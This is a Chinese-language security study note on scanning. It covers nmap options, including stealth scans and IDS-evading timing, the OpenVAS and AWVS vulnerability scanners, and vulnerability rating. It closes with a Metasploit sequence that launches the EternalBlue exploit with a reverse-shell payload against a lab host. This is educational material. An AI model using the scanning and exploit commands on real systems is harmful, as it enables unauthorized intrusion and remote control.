zoukankan      html  css  js  c++  java
  • 网络安全学习笔记:关于扫描

     关于扫描

    1、资产发现

    资产整理,发现,收集 联网设备、主机、服务器、各种服务等

    主机发现 有哪些主机在线,IP地址 端口扫描 确定在线主机开启端口---端口上使用的服务 开启的端口、端口上的服务

    2、nmap

    用处:可以跨网段扫描

    参数

    -sP/-sn 不进行端口扫描
    -p      指定端口
    -p 80
    -p 1-80
    -p 80,3389,8080
    -p 1-65535  -p--sT               TCP全连接扫描  建立完整的三次握手
    nmap 172.16.13.1  -sT
    -sS               SYN半连接扫描  只进行三次握手的前两次
    nmap 172.16.13.1 -p 80 -sS
    ​
            隐蔽扫描
    -sN               Null扫描    标志位全为0
    -sX               Xmas扫描
    -sF               Fin扫描
    -sV             显示服务的详细版本
    nmap -sV 172.16.13.1 -p 80 -sT
    -O                获取操作系统类型(不太准确)
    -oN/-oX           保存扫描结果,txt/xml
                xpath 自学
        nmap -oN name -p 80
    -A                全面扫描  nmap -p- -A 127.0.0.1 
    -T0 ~ -T5         时序选项(扫描速度 T0最慢-用于IDS逃避,默认T3)

    3、漏洞扫描

    Web漏洞扫描
    OpenVAS(扫描操作系统、也可以对网站扫描)
    Configuration -->Targets
    Scans -->Tasks
    AWVS(扫描网站)

    爬行网站目录
    asp、.net、php

    关于漏洞

    漏洞风险等级
    高危、中危、低危、信息泄露
    漏洞扫描
    漏洞危害
    前半部分、后半部分(后半部分---自由发挥)
    修复建议
    前半部分、后半部分

    MSF

    kali下直接         msfconsole
    ​
    msfconsole
    search MS17-010
    use exploit/windows/smb/ms17_010_eternalblue
    set payload windows/x64/meterpreter/reverse_tcp
    set RHOSTS 192.168.1.143    //目标靶机ip
    set LHOST 192.168.1.142    //本机IP
    exploit
  • 相关阅读:
    PHP多条件模糊查询
    纯干货!一款APP从设计稿到切图过程全方位揭秘(转)
    0532. K-diff Pairs in an Array (M)
    0933. Number of Recent Calls (E)
    0139. Word Break (M)
    0713. Subarray Product Less Than K (M)
    0399. Evaluate Division (M)
    0495. Teemo Attacking (M)
    0179. Largest Number (M)
    0389. Find the Difference (E)
  • 原文地址:https://www.cnblogs.com/Xshun-z/p/13957120.html
Copyright © 2011-2022 走看看